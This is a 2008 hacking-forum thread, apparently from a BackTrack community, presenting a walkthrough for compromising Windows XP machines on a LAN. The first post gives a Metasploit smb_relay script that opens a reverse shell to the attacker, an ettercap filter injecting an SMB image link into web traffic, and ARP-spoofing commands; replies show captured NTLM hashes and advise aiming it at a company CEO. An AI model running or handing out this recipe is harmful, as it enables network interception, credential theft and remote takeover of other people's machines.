#1  
Old 03-22-2008, 01:58 AM
operat0r operat0r is online now
Senior Member
 
Join Date: Nov 2006
Posts: 172
Default Own Full patched XP box via HTTP




videos:

# with ettercap
http://s5.video.blip.tv/170000300628...console219.flv

# Thursday, 20 September 2007 ( not with ettercap )
http://www.learnsecurityonline.com/v...ay-reverse.swf




4:42 PM 4/25/2008:
"" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. ""

sadly (sometimes !?!?!?) this is checked by default so I will look into some other things ...
you also want to check out the fastrack mass client side has GDI and QT exploits all in one etc ! ( this is part of the fast-track.py you must update it to current )


Firefox be design will not load a 'local share' this including \\SMB\image.jpg shares
( if anybody has a non javascript workaround please let me know FLASH also has the same security or just gets passed to firefox and then borks )

May be possible to use this trick 301 redirect the user to a local\share
http://forums.remote-exploit.org/showthread.php?p=94904



What you need:
* ettercap
* ms framework3
* victim must have admin privs with no blank password and load an HTTP or HTTPS webpage.
* only works for MIM ( LAN etc .. )

** based on HD moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

change the IP to your IP


smb.rc
Code:
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.90
set LPORT 21
exploit

smb.filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   msg("Filter Ran.\n");
}
# etterfilter makes the smb.ef to use with ettercap

etterfilter smb.filter -o smb.ef
# run ettercap on target
ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc


what happends ??

ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
then attacker say NO access denied ! victim says OK let me try my login by default


""Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges...."""

read the error before that error the guest error just means the auth failed




Quote:
Originally Posted by www
5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.
__________________
Skiddie powers activate !

Last edited by operat0r; 08-26-2008 at 11:00 AM.
Reply With Quote
  #2  
Old 03-26-2008, 10:19 PM
unix_r00ter's Avatar
unix_r00ter unix_r00ter is offline
Member
 
Join Date: Feb 2007
Location: UK | Wales
Posts: 61
Send a message via MSN to unix_r00ter
Default

does this only work on LAN??
__________________
Reply With Quote
  #3  
Old 03-26-2008, 10:23 PM
Deathray's Avatar
Deathray Deathray is offline
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 147
Default

Very interesting ! I'm going to try it out right away.
I'll be back and tell how it went


Quote:
Originally Posted by unix_r00ter View Post
does this only work on LAN??
Read up on MITM (man in the middle) attacks.
Reply With Quote
  #4  
Old 03-26-2008, 10:44 PM
Deathray's Avatar
Deathray Deathray is offline
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 147
Default

Target: Windows XP SP0 no updates at all.
Ettercap
Code:
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Msfconsole
Code:
msf exploit(smb_relay) >
[*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.78:1057 \
[*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser 
LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 
NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser...
[*] Failed to authenticate as VICTIMLOSER\Victimlooser...
And by the way, I think you should lookup the rules about links in signatures.
I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble

Last edited by Deathray; 03-26-2008 at 10:58 PM.
Reply With Quote
  #5  
Old 03-27-2008, 12:24 AM
williamc's Avatar
williamc williamc is offline
Senior Member
 
Join Date: May 2007
Posts: 166
Default

Couple of questions:
Must file sharing be enabled on the victim as mentioned in the presentation?

Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg
Reply With Quote
  #6  
Old 03-27-2008, 02:11 AM
operat0r operat0r is online now
Senior Member
 
Join Date: Nov 2006
Posts: 172
Default

humm ill try it with FF and add the code if it works thanks !
Reply With Quote
  #7  
Old 03-27-2008, 12:47 PM
Dr_GrEeN's Avatar
Dr_GrEeN Dr_GrEeN is offline
Senior Member
 
Join Date: Sep 2007
Location: dark side of the moon
Posts: 573
Send a message via MSN to Dr_GrEeN
Default

Nice little audit, I wrote a tut similar to this last October check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2
__________________
Backtrack 3 pimp daddy. Kernel 2.6.25.1 slackware 12.1, Compiz fusion 0.7.4, lots of new tools, Customized backtrack menu.
Reply With Quote
  #8  
Old 03-27-2008, 05:17 PM
williamc's Avatar
williamc williamc is offline
Senior Member
 
Join Date: May 2007
Posts: 166
Default

Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
Reply With Quote
  #9  
Old 03-27-2008, 05:24 PM
operat0r operat0r is online now
Senior Member
 
Join Date: Nov 2006
Posts: 172
Default

Can you clarify how this will affect a corporate network?
total ownage if they have admin rights ( why ? because nobody has a blank password in a corp LAN )

Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
you need to read how MIM works and also read up on ettercap how it works etc
simply just make a target list insted of // // use the target IP /victomloser_CEO/ //
Reply With Quote
  #10  
Old 03-27-2008, 05:27 PM
operat0r operat0r is online now
Senior Member
 
Join Date: Nov 2006
Posts: 172
Default

Quote:
Originally Posted by Dr_GrEeN View Post
Nice little audit, I wrote a tut similar to this last October check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2
Ya now days I would use a more current sploit say RTSP etc ..
http://rmccurdy.com/scripts/videos/q...3%20msfweb.swf
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules

Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 11:55 AM.


Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.